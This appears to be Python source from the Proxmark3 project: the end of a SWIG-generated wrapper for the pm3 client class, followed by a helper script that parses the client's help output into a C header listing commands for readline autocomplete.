            raise AttributeError("You cannot add class attributes to %s" % cls)
    return set_class_attr


def _swig_add_metaclass(metaclass):
    """Class decorator for adding a metaclass to a SWIG wrapped class - a slimmed down version of six.add_metaclass"""
    def wrapper(cls):
        return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
    return wrapper


class _SwigNonDynamicMeta(type):
    """Meta class to enforce nondynamic attributes (no new attributes) for a class"""
    __setattr__ = _swig_setattr_nondynamic_class_variable(type.__setattr__)


class pm3(object):
    thisown = property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc="The membership flag")
    __repr__ = _swig_repr

    def __init__(self, *args):
        _pm3.pm3_swiginit(self, _pm3.new_pm3(*args))
    __swig_destroy__ = _pm3.delete_pm3

    def console(self, cmd, capture=True, quiet=True):
        return _pm3.pm3_console(self, cmd, capture, quiet)
    name = property(_pm3.pm3_name_get)
    grabbed_output = property(_pm3.pm3_grabbed_output_get)

# Register pm3 in _pm3:
_pm3.pm3_swigregister(pm3)

if __name__ == "__main__":
    print("This is a library, don't use it as a script")



#!/usr/bin/env python3
"""
PM3 Help 2 List

This script takes the full text help output from the PM3 client and converts it to a list to be used for readline autocomplete.

It is based on pm3_help2JSON.py by
Original Authors / Maintainers:
 - Samuel Windall

This version
 - Iceman

Note:
    This script is used as a helper script to generate the pm3line_vocabulary.h file.
    It need a working proxmark3 client to extract the help text.

    Ie: this script can't be used inside the normal build sequence.
"""

import re
import datetime
import argparse
import logging

##############################################################################
# Script version data: (Please increment when making updates)

APP_NAME = 'PM3Help2List'

VERSION_MAJOR = 1
VERSION_MINOR = 0

##############################################################################
# Main Application Code:


def main():
    """The main function for the script"""
    args = build_arg_parser().parse_args()
    logging_format = '%(message)s'
    if args.debug:
        logging.basicConfig(level=logging.DEBUG, format=logging_format)
    else:
        logging.basicConfig(level=logging.WARN, format=logging_format)
    logging.info(f'{get_version()} starting...')
    help_text = args.input_file.read()
    command_data = parse_all_command_data(help_text)

    args.output_file.write("""//-----------------------------------------------------------------------------
// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
//
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// See LICENSE.txt for the text of the license.
//-----------------------------------------------------------------------------
// readline auto complete utilities
//-----------------------------------------------------------------------------

#ifndef PM3LINE_VOCABULARY_H__
#define PM3LINE_VOCABULARY_H__

#ifdef __cplusplus
extern "C" {
#endif

#include <stdbool.h>

typedef struct vocabulary_s {
    bool offline;
    const char *name;
} vocabulary_t;

const static vocabulary_t vocabulary[] = {\n""")

    for key, values in command_data.items():
        offline = 0
        if (values['offline'] == True):
            offline = 1

        cmd = values['command']

        args.output_file.write('    {{ {}, "{}" }},\n'.format(offline, cmd))

    args.output_file.write("""    {0, NULL}\n};

#ifdef __cplusplus
}
#endif

#endif
""")

    logging.info(f'{get_version()} completed!')


def build_arg_parser():
    """Build the argument parser for reading the program arguments"""
    parser = argparse.ArgumentParser()
    parser.add_argument('input_file', type=argparse.FileType('r'), help='Source of full text help from the PM3 client.')
    parser.add_argument('output_file', type=argparse.FileType('w'), help='Destination for list output.')
    parser.add_argument('--version', '-v', action='version', version=get_version(), help='Version data about this app.')
    parser.add_argument('--debug', '-d', action='store_true', help='Log debug messages.')
    return parser


def build_help_regex():
    """The regex uses to parse the full text output of help data from the pm3 client."""
    # Reads the divider followed by the command itself
    re_command = r'-{87}\n(?P<command>.+)\n'

    # Reads if the command is available offline
    re_offline = r'available offline: (?P<offline>yes|no)\n+'

    return re.compile(re_command+re_offline, re.MULTILINE);


def parse_all_command_data(help_text):
    """Turns the full text output of help data from the pm3 client into a list of dictionaries"""
    command_dicts = {}
    # Strip out ANSI escape sequences
    help_text = remove_ansi_escape_codes(help_text)
    # Find all commands in the full text help output
    matches = build_help_regex().finditer(help_text)
    for match in matches:
        # Turn a match into a dictionary with keys for the extracted fields
        command_object = parse_command_data(match)
        # Store this command against its name for easy lookup
        command_dicts[command_object['command']] = command_object
    return command_dicts


def parse_command_data(match):
    """Turns a regex match of a command in the help text and converts it into a dictionary"""
    logging.info('Parsing new command...')
    # Get and clean the command string
    command = remove_extra_whitespace(match.group('command'))
    logging.info(f'    Command: {command}')

    # Get the online status as a boolean. Note: the regex only picks up 'yes' or 'no' so this check is safe.
    offline = (match.group('offline') == 'yes')
    logging.debug(f'    Offline: {offline}')

    # Construct the command dictionary
    command_data = {
        'command': command,
        'offline': offline,
    }
    logging.info('Completed parsing command!')
    return command_data


##############################################################################
# Helper Functions:


def get_version():
    """Get the version string for this script"""
    return f'{APP_NAME} v{VERSION_MAJOR}.{VERSION_MINOR:02}'


def remove_ansi_escape_codes(text):
    """Remove ANSI escape sequences that may be left in the text."""
    re_ansi_escape = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -/]*[@-~]')
    return re_ansi_escape.sub('', str(text)).lower()


def remove_extra_whitespace(text):
    """Removes extra whitespace that may be in the text."""
    # Ensure input is a string
    text = str(text)
    # Remove whitespace from the start and end of the text
    text = text.strip()
    # Deduplicate spaces in the string
    text = re.sub(r' +', ' ', text)
    return text


def text_to_oneliner(text):
    """Converts a multi line string into a single line string and removes extra whitespace"""
    # Ensure input is a string
    text = str(text)
    # Replace newlines with spaces
    text = re.sub(r'\n+', ' ', text)
    # Remove the extra whitespace
    text = remove_extra_whitespace(text)
    return text


def text_to_list(text):
    """Converts a multi line string into a list of lines and removes extra whitespace"""
    # Ensure input is a string
    text = str(text)
    # Get all the lines
    lines = text.strip().split('\n')
    # For each line clean up any extra whitespace
    return [remove_extra_whitespace(line) for line in lines]


##############################################################################
# Application entrypoint:

if __name__ == '__main__':
    main()
